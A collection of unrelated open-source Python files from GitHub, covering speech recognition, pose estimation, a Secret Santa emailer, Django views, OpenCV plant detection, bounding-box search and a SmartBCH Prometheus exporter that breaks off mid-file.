+{"seq_id":"16709369930","text":"#coding=utf-8\nimport sys\n\nimport tensorflow as tf\n\nfrom model_speech.cnn_ctc_dataset import input_fn, load_vocab, load_data\nfrom model_speech.cnn_ctc_estimator_v2 import AMEstimator\n\nlabel_vocab = load_vocab(['./data/thchs_train.txt', './data/thchs_dev.txt', './data/thchs_test.txt'])\nwav_lst, pny_lst = load_data(['./data/thchs_train.txt'], './data/', size=4)\n# dev_wav_lst, dev_pny_lst = load_data(['./data/thchs_dev.txt'], './data/')\nconfig = tf.ConfigProto()\nconfig.intra_op_parallelism_threads = 8\nconfig.inter_op_parallelism_threads = 8\nrun_config = tf.estimator.RunConfig().replace(\n session_config=config)\nam = AMEstimator(len(label_vocab), 'train', label_vocab, './logs_am_new_3', None, run_config)\nresult = am.predict(input_fn = lambda: input_fn('pred', 4, wav_lst, pny_lst, label_vocab),\n predict_keys=None,\n hooks=None,\n checkpoint_path=None,\n yield_single_examples=True)\nprint(result)\n#\nfor r in result:\n text = []\n print(r['input_length'])\n # print(r['label_length'])\n for i in r['text_ids']:\n text.append(label_vocab[i])\n text = ' '.join(text)\n print('文本结果:', text)\n # text = []\n # for i in r['y_true']:\n # text.append(label_vocab[i])\n # text = ' '.join(text)\n # print('原文结果:', text)\n# print('原文结果:', ' '.join(feats['the_labels']))","repo_name":"nietao2/DeepSpeechRecognition","sub_path":"test_estimator_v2.py","file_name":"test_estimator_v2.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"40225495133","text":"import argparse\nimport logging\nimport time\nimport pickle\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tf_pose.estimator import TfPoseEstimator\nfrom tf_pose.networks import get_graph_path, model_wh\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='tf-pose-estimation realtime webcam')\n # parser.add_argument('--camera', type=int, default=0)\n\n parser.add_argument('--resize', type=str, default='0x0',\n help='if provided, resize images before they are processed. default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')\n parser.add_argument('--resize-out-ratio', type=float, default=4.0,\n help='if provided, resize heatmaps before they are post-processed. default=1.0')\n\n parser.add_argument('--model', type=str, default='mobilenet_thin', help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')\n parser.add_argument('--show-process', type=bool, default=False,\n help='for debug purpose, if enabled, speed for inference is dropped.')\n \n parser.add_argument('--tensorrt', type=str, default=\"False\",\n help='for tensorrt process.')\n parser.add_argument('--vidloc', type=str, default='')\n args = parser.parse_args()\n\n w, h = model_wh(args.resize)\n if w > 0 and h > 0:\n e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h), trt_bool=str2bool(args.tensorrt))\n else:\n e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368), trt_bool=str2bool(args.tensorrt))\n cap = cv2.VideoCapture(args.vidloc)\n\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('input_pose.mp4', fourcc, 30.0, (640, 640))\n\n parts_frames = {}\n counter = 0\n while True:\n ret,image = cap.read()\n if ret==False:\n break\n print(image.shape)\n humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)\n black = np.ones((640, 640, 3))\n image = TfPoseEstimator.draw_humans(black, humans, imgcopy=False)\n\n # cv2.imshow('tf-pose-estimation result', image)\n parts_points = {}\n list_of_parts = ['nose', 'sternum', 'right_shoulder', 'right_elbow', 'right_palm', \n 'left_shoulder', 'left_elbow', 'left_palm', 'right_hip', 'right_knee', \n 'right_ankle', 'left_hip', 'left_knee', 'left_ankle', 'right_eye', \n 'left_eye', 'right_ear', 'left_ear']\n for i, part in enumerate(list_of_parts):\n try:\n parts_points[part] = (int(humans[0].body_parts[i].x * 640), int(humans[0].body_parts[i].y * 640))\n except:\n parts_points[part] = (None, None)\n parts_frames[counter] = parts_points\n counter += 1\n # print(parts_points)\n # plt.imshow(image)\n # plt.show()\n image = image * 255\n image = np.uint8(image.astype(int))\n\n out.write(image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Saving the objects:\nwith open('objs.pkl', 'wb') as f:\n pickle.dump(parts_frames, f)\nout.release()\ncap.release()\n","repo_name":"bipinkc19/squat-counter","sub_path":"get_points.py","file_name":"get_points.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"69"}
+{"seq_id":"38244060024","text":"import random\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\nSENDER_EMAIL = os.getenv(\"SENDER_EMAIL\")\nAPP_PASSWORD = os.getenv(\"APP_PASSWORD\")\n\nclass Participant:\n def __init__(self, participant_id, name, email=None, restrictions=[]):\n self.participant_id = participant_id\n self.name = name\n self.email = email\n self.restrictions = restrictions\n\ndef match_people(start_people):\n # randomize\n random.shuffle(start_people)\n # sort by number of restrictions: max to min\n people = sorted(start_people, key=lambda person: len(person.restrictions), reverse=True)\n potential_matches = people.copy()\n matches = {}\n\n # iterate from most restrictions to least restrictions, \n # trying to match most restricted people first\n for person in people:\n for i, potential_match in enumerate(potential_matches):\n # if potential_match is not also the person trying to be matched and\n # is not restricted and \n # does not have the person trying to get matched\n if (potential_match != person and\n potential_match.name not in person.restrictions and\n matches.get(potential_match) != person):\n matches[person] = potential_match\n potential_matches.pop(i)\n break\n \n # person could not be matched\n if i == len(potential_matches) - 1:\n # already gone through everything and matches is empty\n if not matches:\n return None\n\n # attempt to replace from an earlier match\n for i, (gifter, recipient) in enumerate(matches.items()):\n if (person != recipient and\n recipient.name not in person.restrictions and\n matches.get(recipient) != person and\n person.name not in gifter.restrictions):\n matches[gifter] = person\n matches[person] = recipient\n break\n \n # no replacements could be made\n if i == len(matches) - 1:\n return None\n \n return matches\n\n\ndef send_emails(matches, message_text, message_html):\n server = smtplib.SMTP_SSL(\"smtp.gmail.com\", 465)\n server.ehlo()\n server.login(SENDER_EMAIL, APP_PASSWORD)\n \n for gifter, recipient_name in matches:\n msg = MIMEMultipart(\"alternative\")\n msg[\"Subject\"] = \"Secret Santa\"\n msg[\"From\"] = f\"Secret Santa Organizer <{SENDER_EMAIL}>\"\n msg[\"To\"] = gifter[1]\n \n # Create the body of the message (a plain-text and an HTML version)\n text = f\"Your person is {recipient_name}.\\n\\n{message_text}\"\n \n html = f\"\"\"\\\n \n \n Your person is {recipient_name} .
\n {message_html}\n \n \n \"\"\"\n\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n msg.attach(part1)\n msg.attach(part2)\n\n server.sendmail(SENDER_EMAIL, gifter[1], msg.as_string())\n\n server.quit()\n\n\ndef log(matches):\n log_message = \"\"\n\n for gifter, recipient_name in matches:\n log_message += f\"{gifter[0]} has to get a gift for {recipient_name}\\n\"\n\n with open(\"secret_santa_log.txt\", \"w\") as f:\n f.write(log_message)\n\ndef get_organizer_emails(form):\n \"\"\"Get up to 15 organizer emails from an input form.\"\"\"\n\n return form.getlist(\"organizer\")[:15]\n\ndef get_participants(form):\n \"\"\"Get up to 100 participants from an input form.\"\"\"\n\n participants = []\n null_participants = 0\n for i in range(100):\n participant = form.getlist(f\"participant{i}\")\n\n if participant == []:\n null_participants += 1\n\n if null_participants >= 5:\n break\n \n continue\n\n name, email = participant\n \n if name == \"\" and email == \"\":\n continue\n \n # if the user inserted a name or email that was too long\n if len(name) > 50 or len(email) > 200:\n return []\n \n if name == \"\":\n name = email\n \n # set email to none if it is blank, organizers will have to contact\n elif email == \"\":\n email = None\n \n restrictions = [restriction for restriction in form.getlist(f\"participant{i}restriction\") if restriction != \"\"]\n\n participants.append(Participant(i, name, email, restrictions))\n \n return participants\n\n","repo_name":"sachinraja/secretsantaorganizer","sub_path":"app/utils/secret_santa.py","file_name":"secret_santa.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26521857727","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom . models import Msg\nfrom django.contrib import messages\nimport os\n# Create your views here.\n\n\n\nfrom django.http import HttpResponse\nimport os\n\ndef download_file(request):\n file_path = os.path.join('static/media/myfile.pdf') # Replace with the actual file path\n if os.path.exists(file_path):\n with open(file_path, 'rb') as file:\n response = HttpResponse(file.read(), content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path)\n return response\n else:\n return HttpResponse('File not found.')\n\n\n\n\ndef index(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n message = request.POST.get('message')\n msg=Msg(name=name, email=email, phone=phone, message=message)\n msg.save()\n messages.success(request, 'Contact added successfully!')\n return render(request, 'index.html')","repo_name":"varghesejojo/mywebsite","sub_path":"profileproject/proapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71506628379","text":"import cv2\nimport numpy as np\n\"\"\"\n자동 객체 인식을 위한 기초 전처리 \n\"\"\"\n\n\n# 색범위 필터링\ndef color_filter(img, lower, upper):\n \"\"\"\n 색상 필터링\n 참고) 필터링할 색 범위 지정(hsv system)에 대하여\n hsv 색공간은 h -> theta(θ), s -> r, v -> z 인 원주좌표계로 생각할 수 있다.\n 그러나 opencv 에서 색상(h) 범위는 0~179, 채도(s) 범위 0 ~ 255, 명암(v) 범위 0 ~ 255 이므로\n 원주좌표계 상에 표현된 hsv 값을 opencv의 스케일에 맞게 변환하여야 한다.\n\n Args:\n img: 처리 전 이미지, 3차원 numpy ndarray 객체\n lower: hsv 색공간에서 하한선, 길이가 3인 numpy array 객체\n upper: hsv 색공간에서 상한선, 길이가 3인 numpy array 객체\n\n returns:\n 지정 범위의 색을 제외한것을 False, 지정 범위의 색을 포함한것을 True로 하는 binary 이미지,\n 2차원 numpy ndarray 객체\n \"\"\"\n mask = cv2.inRange(img, lower, upper)\n result = cv2.bitwise_and(img, img, mask=mask)\n # mask_inverse = cv2.bitwise_not(mask)\n # result_inverse = cv2.bitwise_and(img_grass, img_grass, mask=mask_inverse)\n return mask\n\n# 경계선 감지\ndef boundary(img):\n \"\"\"\n 이미지의 경계선을 감지. 블러 처리 후 Canny edge filter 사용\n\n Args:\n img: 경계선을 감지할 이미지, cv2 img 객체\n\n returns:\n 경계선을 True로 하는 binary 이미지, 2차원 numpy ndarray 객체\n \"\"\"\n blur = cv2.GaussianBlur(img, ksize=(3, 3), sigmaX=50)\n result = cv2.Canny(blur, 100, 200)\n return result\n\n# 객체 탐지(레이블링)\ndef labeling(binary_mask, front_image, filter_size):\n \"\"\"\n 이어진 부분을 한 객체로 인식하고 인식된 부분을 직사각형으로 라벨링하여 표시하는 함수\n\n Args:\n binary_mask: component 인식을 위한 binary 이미지, numpy ndarray 객체\n front_image: 인식 결과를 합성할 원본 이미지, numpy ndarray 객체\n filter_size: threshold 크기, 이 값보다 작은 크기의 component는 무시한다, int 객체\n\n returns:\n binary 이미지를 분석하여 객체를 인식하고 그 결과를 원본 이미지에 라벨링한 bgr 이미지 리턴,\n 3차원 numpy ndarray 객체\n \"\"\"\n count, labels, stats, centroids = cv2.connectedComponentsWithStats(binary_mask)\n # img_gbr = cv2.cvtColor(binary_mask, cv2.COLOR_GRAY2BGR)\n\n for i in range(1, count):\n (x, y, w, h, area) = stats[i]\n if area < filter_size:\n continue\n cv2.rectangle(front_image, (x, y, w, h), (255, 0, 0))\n\n return front_image\n\ndef point_clustering(image_path):\n \"\"\"\n 경계선 검출, 색상 검출, morphology, conponent 인식 순으로 이미지를 처리한 후 레이블 클러스터링을 통해\n 식물을 인식하기 위한 함수\n\n Args:\n image_path: 분석 대상 이미지 경로, str 객체\n\n returns:\n 이미지 클러스터링을 위해 component를 인식후 centroid 와 함께 라벨링한 bgr 이미지, 3차원 numpy ndarray\n \"\"\"\n image_bgr = cv2.imread(image_path)\n image_hsv = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2HSV)\n\n # 색상 필터 적용을 위한 파라미터\n lower = np.array([26, 25, 25])\n upper = np.array([83, 245, 245])\n\n # 경계선 감지, 색상 감지\n boundary_mask = boundary(image_hsv)\n color_mask = color_filter(image_hsv, lower, upper)\n\n # 마스크 and 연산\n merged_mask = cv2.bitwise_and(boundary_mask, color_mask)\n\n # morphology 연산\n morph_gradient = cv2.morphologyEx(merged_mask, cv2.MORPH_CLOSE, None)\n morph_open = cv2.morphologyEx(morph_gradient, cv2.MORPH_OPEN, None)\n\n # component 인식\n count, labels, stats, centroids = cv2.connectedComponentsWithStats(morph_open)\n\n for i in range(1, count):\n (x, y) = centroids[i]\n (x_area, y_area, w, h, area) = stats[i]\n if area < 50:\n continue\n cv2.circle(image_bgr, (int(x), int(y)), 10, (255, 0, 0), 2)\n cv2.rectangle(image_bgr, (x_area, y_area, w, h), (0, 0, 255))\n\n return image_bgr\n\ndef label_clustering(image_path):\n \"\"\"\n 경계선 검출, 색상 검출, conponent 인식 순으로 이미지를 처리한 후 레이블 클러스터링을 통해\n 식물을 인식하기 위한 함수\n\n Args:\n image_path: 분석 대상 이미지 경로, str 객체\n\n returns:\n 이미지 클러스터링을 위해 component를 인식후 라벨링한 bgr 이미지, 3차원 numpy ndarray\n \"\"\"\n image_bgr = cv2.imread(image_path)\n image_hsv = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2HSV)\n\n # 색상 필터 적용을 위한 파라미터\n lower = np.array([26, 25, 25])\n upper = np.array([83, 245, 245])\n\n # 경계선 감지, 색상 감지\n boundary_mask = boundary(image_hsv)\n color_mask = color_filter(image_hsv, lower, upper)\n\n # 마스크 and 연산\n merged_mask = cv2.bitwise_and(boundary_mask, color_mask)\n\n # component 인식 후 레이블링\n result = labeling(merged_mask, image_bgr, 70)\n return result\n\ndef plant_boundary(image_path):\n \"\"\"\n 식물의 경계를 검출하는 함수\n\n Args:\n image_path: 분석 대상 이미지의 경로, str 객체\n\n returns:\n 식물의 경계를 검출한 binary 이미지, 2차원 numpy ndarray\n \"\"\"\n image_bgr = cv2.imread(image_path)\n image_hsv = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2HSV)\n image_gray = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2GRAY)\n\n # 색 범위 변수, 노랑~파랑의 범위 내에서 적절히 조정하였음\n lower1 = np.array([26, 70, 70])\n upper1 = np.array([83, 250, 250])\n\n # CLAHE\n # 히스토그램 균일화\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n clahe_image = clahe.apply(image_gray)\n\n # 경계검출, 색상 검출\n boundary_canny = boundary(clahe_image)\n color_mask = color_filter(image_hsv, lower1, upper1)\n\n # 이진화된 영상에 and 연산 수행\n combined_mask = cv2.bitwise_and(boundary_canny, color_mask)\n\n # 모폴로지 연산: 그래디언트\n morph_gradient = cv2.morphologyEx(combined_mask, cv2.MORPH_GRADIENT, None)\n\n return morph_gradient\n\n\ndef main():\n boundary_img1 = plant_boundary(\"./test_image/for_rec.jpg\")\n boundary_img2 = plant_boundary(\"./test_image/se1.png\")\n\n\n # case1_img1 = point_clustering(\"./test_image/for_rec.jpg\")\n # case1_img2 = point_clustering(\"./test_image/se1.png\")\n #\n # case2_img1 = label_clustering(\"./test_image/for_rec.jpg\")\n # case2_img2 = label_clustering(\"./test_image/se1.png\")\n\n cv2.imshow('boundary_img1', boundary_img1)\n cv2.imshow('boundary_img2', boundary_img2)\n # cv2.imshow('case1_img1', case1_img1)\n # cv2.imshow('case1_img2', case1_img2)\n # cv2.imshow('case2_img1', case2_img1)\n # cv2.imshow('case2_img2', case2_img2)\n cv2.waitKey()\n cv2.destroyAllW\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"hyeonghak96/Mix_project","sub_path":"openCV_examples/image_filter.py","file_name":"image_filter.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7453967577","text":"from greenlet import greenlet\n# 执行test1,执行test2,跳回来,继续\n# 执行test没执行完的内容,再执行test2没执行完的内容\ndef test1():\n print(\"执行test1\")\n gr2.switch()\n print(\"结束test1\")\n gr2.switch()\n\ndef test2():\n print(\"执行test2\")\n gr1.switch()\n print(\"结束test2\")\n\n# 将函数变为协程\ngr1 = greenlet(test1)\ngr2 = greenlet(test2)\n\n# 执行协程1\ngr1.switch()","repo_name":"suprviserpy632157/zdy","sub_path":"ZDY/Feb_all/python多任务编程/February0209/afternoon/greenlet_0.py","file_name":"greenlet_0.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"75022902618","text":"import logging\nfrom typing import List, Tuple\n\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\n\ndef compute_polygon_bboxes(polygons: np.ndarray) -> np.ndarray:\n \"\"\"Compute the minimum size enclosing xy bounding box for each polygon that is provided as input.\n Args:\n polygons: an array of type 'O' (object) with shape (n,). Each object has shape (m, 3+).\n\n Returns:\n polygon_bboxes: a float array with shape (n, 4).\n \"\"\"\n bboxes: List[np.ndarray] = []\n\n for polygon in polygons:\n bbox = compute_point_cloud_bbox(polygon)\n bboxes.append(bbox)\n\n polygon_bboxes = np.array(bboxes)\n return polygon_bboxes\n\n\ndef compute_point_cloud_bbox(point_cloud: np.ndarray, verbose: bool = False) -> np.ndarray:\n \"\"\"Given a set of 2D or 3D points, find the minimum size axis-aligned bounding box in the xy plane (ground plane).\n\n Args:\n point_cloud: an array of dim (N,3) or (N,2).\n verbose: False by default, if set to True, it prints the bounding box dimensions.\n\n Returns:\n bbox: an array of dim (4,) representing x_min, y_min, x_max, y_max.\n \"\"\"\n x_min = np.amin(point_cloud[:, 0])\n x_max = np.amax(point_cloud[:, 0])\n\n y_min = np.amin(point_cloud[:, 1])\n y_max = np.amax(point_cloud[:, 1])\n\n bbox_width = x_max - x_min\n bbox_height = y_max - y_min\n\n bbox = np.array([x_min, y_min, x_max, y_max])\n\n if verbose:\n logger.info(f\"Point cloud bbox width = {bbox_width}, height = {bbox_height}\")\n return bbox\n\n\ndef find_all_polygon_bboxes_overlapping_query_bbox(polygon_bboxes: np.ndarray, query_bbox: np.ndarray) -> np.ndarray:\n \"\"\"Find all the overlapping polygon bounding boxes.\n\n Each bounding box has the following structure:\n bbox = np.array([x_min,y_min,x_max,y_max])\n\n In 3D space, if the coordinates are equal (polygon bboxes touch), then these are considered overlapping.\n We have a guarantee that the cropped image will have any sort of overlap with the zero'th object bounding box\n inside of the image e.g. along the x-dimension, either the left or right side of the bounding box lies between the\n edges of the query bounding box, or the bounding box completely engulfs the query bounding box.\n\n Args:\n polygon_bboxes: An array of shape (K,), each array element is a NumPy array of shape (4,) representing\n the bounding box for a polygon or point cloud.\n query_bbox: An array of shape (4,) representing a 2d axis-aligned bounding box, with order\n [min_x,min_y,max_x,max_y].\n\n Returns:\n An integer array of shape (K,) representing indices where overlap occurs.\n \"\"\"\n query_min_x = query_bbox[0]\n query_min_y = query_bbox[1]\n\n query_max_x = query_bbox[2]\n query_max_y = query_bbox[3]\n\n bboxes_x1 = polygon_bboxes[:, 0]\n bboxes_x2 = polygon_bboxes[:, 2]\n\n bboxes_y1 = polygon_bboxes[:, 1]\n bboxes_y2 = polygon_bboxes[:, 3]\n\n # check if falls within range\n overlaps_left = (query_min_x <= bboxes_x2) & (bboxes_x2 <= query_max_x)\n overlaps_right = (query_min_x <= bboxes_x1) & (bboxes_x1 <= query_max_x)\n\n x_check1 = bboxes_x1 <= query_min_x\n x_check2 = query_min_x <= query_max_x\n x_check3 = query_max_x <= bboxes_x2\n x_subsumed = x_check1 & x_check2 & x_check3\n\n x_in_range = overlaps_left | overlaps_right | x_subsumed\n\n overlaps_below = (query_min_y <= bboxes_y2) & (bboxes_y2 <= query_max_y)\n overlaps_above = (query_min_y <= bboxes_y1) & (bboxes_y1 <= query_max_y)\n\n y_check1 = bboxes_y1 <= query_min_y\n y_check2 = query_min_y <= query_max_y\n y_check3 = query_max_y <= bboxes_y2\n y_subsumed = y_check1 & y_check2 & y_check3\n y_in_range = overlaps_below | overlaps_above | y_subsumed\n\n overlap_indxs = np.where(x_in_range & y_in_range)[0]\n return overlap_indxs\n\n\ndef find_local_polygons(\n lane_polygons: np.ndarray,\n lane_bboxes: np.ndarray,\n query_min_x: float,\n query_max_x: float,\n query_min_y: float,\n query_max_y: float,\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Find local polygons. We always also return indices.\n\n Take a collection of precomputed polygon bounding boxes, and compare with a query bounding box then returns the\n polygons that overlap, along with their array indices.\n\n Args:\n lane_polygons: An array of polygons.\n lane_bboxes: An array of shape (K,), each array element is a NumPy array of shape (4,) representing\n the bounding box for a polygon or point cloud.\n query_min_x: minimum x coordinate of the query bounding box.\n query_max_x: maximum x coordinate of the query bounding box.\n query_min_y: minimum y coordinate of the query bounding box.\n query_max_y: maximum y coordinate of the query bounding box.\n return_indices: False by default, if set to True, the overlapping indices are returned along with the\n overlapping polygon.\n\n Returns:\n Overlapping polygon.\n Overlapping indices.\n \"\"\"\n query_bbox = np.array([query_min_x, query_min_y, query_max_x, query_max_y])\n overlap_indxs = find_all_polygon_bboxes_overlapping_query_bbox(lane_bboxes, query_bbox)\n\n pruned_lane_polygons = lane_polygons[overlap_indxs]\n return pruned_lane_polygons, overlap_indxs\n\n\ndef prune_polygons_manhattan_dist(\n query_pt: np.ndarray,\n points_xyz: np.ndarray,\n query_search_range_manhattan: float = 200.0,\n) -> np.ndarray:\n \"\"\"Prune polygon points based on a search area defined by the manhattan distance.\n\n Take a collection of small point clouds and return only point clouds that fall within a manhattan search radius of\n the 2D query point.\n\n Similar to the function above, except query bounding box and polygon bounding boxes are not pre-computed, meaning\n they must be computed on fly, which can be quite computationally expensive in a loop.\n\n Args:\n query_pt: Numpy n-d array with dimension (2,) representing xy query location.\n points_xyz: An array of shape (n,) of array objects. Each array object could be a 2D or 3D polygon, i.e. of\n shape (m,2) or (m,3) respectively.\n query_search_range_manhattan: Side length of query bounding box square which is set to 200 by default.\n\n Returns:\n An array pruned xyz point objects of shape (k,). Each array object could be a 2D or 3D polygon, i.e. of shape\n (m,2) or (m,3) respectively.\n \"\"\"\n bboxes = compute_polygon_bboxes(points_xyz)\n\n query_min_x = query_pt[0] - query_search_range_manhattan\n query_max_x = query_pt[0] + query_search_range_manhattan\n query_min_y = query_pt[1] - query_search_range_manhattan\n query_max_y = query_pt[1] + query_search_range_manhattan\n\n query_bbox = np.array([query_min_x, query_min_y, query_max_x, query_max_y])\n overlap_indxs = find_all_polygon_bboxes_overlapping_query_bbox(bboxes, query_bbox)\n\n pruned_points_xyz = points_xyz[overlap_indxs]\n return pruned_points_xyz\n","repo_name":"argoverse/argoverse-api","sub_path":"argoverse/utils/manhattan_search.py","file_name":"manhattan_search.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":760,"dataset":"github-code","pt":"69"}
+{"seq_id":"31466061585","text":"\"\"\"\nTensorflow implementation of the Cross entropy loss with label smoothing.\n\nOriginal paper:\nSzegedy et al. Rethinking the Inception Architecture for Computer Vision. CVPR 2016.\n\nModified from torch implementation:\nhttps://github.com/mikwieczorek/centroids-reid/blob/main/losses/triplet_loss.py\n\"\"\"\n\nimport tensorflow as tf\nfrom typing import Any, Callable\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.losses import CategoricalCrossentropy\nfrom tensorflow_similarity.types import IntTensor, FloatTensor\n\n\nXENT_DENSE_INITIALIZER = {\n\t'class_name': 'RandomNormal',\n\t'config': {\n\t\t'mean': 0.0,\n\t\t'stddev': 0.001\n\t}\n}\n\n\nclass CrossEntropyLabelSmooth(tf.keras.losses.Loss):\n\t\"\"\"\n\tCross entropy loss with label smoothing regularizer.\n\n\tEquation: y = (1 - epsilon) * y + epsilon / K.\n\n\tArgs:\n\t\tnum_classes (int): number of classes.\n\t\tepsilon (float): weight.\n\n\t\"\"\"\n\n\tdef __init__(\n\t\t\tself,\n\t\t\tnum_classes: int,\n\t\t\tepsilon: float = 0.1,\n\t\t\treduction: Callable = tf.keras.losses.Reduction.AUTO,\n\t\t\tname: str = 'xent_label_smooth',\n\t\t\t**kwargs\n\t) -> None:\n\n\t\tsuper().__init__(reduction=reduction, name=name, **kwargs)\n\n\t\tself.epsilon = epsilon\n\t\tself.num_classes = num_classes\n\n\t\tself.fully_connected_layer = layers.Dense(\n\t\t\tunits=num_classes,\n\t\t\tactivation=None,\n\t\t\tuse_bias=False,\n\t\t\tkernel_initializer=XENT_DENSE_INITIALIZER,\n\t\t\tdtype='float32'\n\t\t)\n\n\t\tself.cross_entropy = CategoricalCrossentropy(\n\t\t\tlabel_smoothing=epsilon,\n\t\t\treduction=reduction,\n\t\t\tfrom_logits=True\n\t\t)\n\n\t\tself.fill_value = 1\n\n\tdef call(\n\t\t\tself,\n\t\t\tlabels: IntTensor,\n\t\t\tembeddings: FloatTensor\n\t) -> Any:\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tlabels: ground truth labels with shape (batch_size)\n\t\t\tembeddings: embeddings with shape (batch_size, embedding_size)\n\t\t\"\"\"\n\n\t\tcls_score = self.fully_connected_layer(embeddings)\n\t\tlog_probs = tf.nn.log_softmax(logits=cls_score, axis=1)\n\n\t\t_, labels_idx = tf.unique(labels)\n\t\tdepth = log_probs.shape[-1]\n\t\tbinary_labels = tf.one_hot(\n\t\t\tindices=labels_idx,\n\t\t\tdepth=depth,\n\t\t\ton_value=self.fill_value,\n\t\t\tdtype=tf.float32\n\t\t)\n\n\t\tloss = self.cross_entropy(\n\t\t\ty_true=binary_labels,\n\t\t\ty_pred=tf.cast(log_probs, dtype=tf.float32)\n\t\t)\n\n\t\treturn loss\n","repo_name":"RevisorTeam/evolly","sub_path":"examples/tf_examples/image_retrieval/losses/xent_label_smooth.py","file_name":"xent_label_smooth.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"32214395378","text":"import sys\nimport re\nfrom collections import namedtuple, defaultdict\n\nClaim = namedtuple('Claim', 'id left top width height')\n\n\ndef claim_points(claim):\n for y in range(0, claim.height):\n for x in range(0, claim.width):\n yield x, y\n\n\ndef step1(claims):\n d = defaultdict(lambda: defaultdict(int))\n r = 0\n for claim in claims:\n for x, y in claim_points(claim):\n c = d[claim.top + y][claim.left + x]\n d[claim.top + y][claim.left + x] += 1\n if c == 1:\n r += 1\n return r\n\n\ndef step2(claims):\n d = defaultdict(lambda: defaultdict(set))\n for claim in claims:\n for x, y in claim_points(claim):\n d[claim.top + y][claim.left + x] |= {claim.id}\n for claim in claims:\n poss = True\n for x, y in claim_points(claim):\n if d[claim.top + y][claim.left + x] != {claim.id}:\n poss = False\n break\n if poss:\n return claim.id\n raise ValueError('No solution found')\n\n\ndef read_claims():\n claims = []\n for line in sys.stdin:\n claim_id, left, right, width, height = re.match(\n r'#(\\d+) @ (\\d+),(\\d+): (\\d+)x(\\d+)',\n line\n ).groups()\n claims += [Claim(int(claim_id), int(left),\n int(right), int(width), int(height))]\n return claims\n\n\nclaims = read_claims()\nprint(step1(claims))\nprint(step2(claims))\n\n","repo_name":"plilja/adventofcode","sub_path":"2018/day03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3854677694","text":"#!/usr/bin/env python3\n# smartbchd-monitor.py\n#\n# An exporter for Prometheus and SmartBCH.\n#\n\nimport json\nimport logging\nimport time\nimport os\nimport signal\nimport sys\nimport socket\n\nfrom datetime import datetime\nfrom functools import lru_cache\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Union\nfrom wsgiref.simple_server import make_server\n\nimport riprova\n\nfrom bitcoin.rpc import JSONRPCError, InWarmupError, Proxy\nfrom prometheus_client import make_wsgi_app, Gauge, Counter\n\n\nlogger = logging.getLogger(\"smartbch-exporter\")\n\n\n# Create Prometheus metrics to track smartbchd stats.\nSMARTBCH_BLOCK = Gauge(\"smartbch_block\", \"Block Height\")\nSMARTBCH_BLOCK_TRANSACTIONS = Gauge(\"smartbch_block_transactions\", \"Transaction in block\")\nSMARTBCH_BLOCK_VALUES = Gauge(\"smartbch_block_value\", \"Total BCH in block\")\nSMARTBCH_BLOCK_GAS_USED = Gauge(\"smartbch_block_gas_used\", \"Gas used in block\")\nSMARTBCH_BLOCK_GAS_LIMIT = Gauge(\"smartbch_block_gas_limit\", \"Gas limit in block\")\nSMARTBCH_BLOCK_NONCE = Gauge(\"smartbch_block_nonce\", \"Block nonce\")\nSMARTBCH_BLOCK_DIFFICULTY = Gauge(\"smartbch_block_difficulty\", \"Block difficulty\")\nSMARTBCH_BLOCK_UNCLES = Gauge(\"smartbch_block_uncles\", \"Block uncles\")\nSMARTBCH_BLOCK_SIZE_BYTES = Gauge(\"smartbch_block_size_bytes\", \"Block size in bytes\")\nSMARTBCH_BLOCK_TIMESTAMP = Gauge(\"smartbch_block_timestamp\", \"Block timestamp\")\n\n\nSMARTBCH_BLOCK_CONTRACTS_CREATED = Gauge(\"smartbch_block_contracts_created\", \"Contracts created in 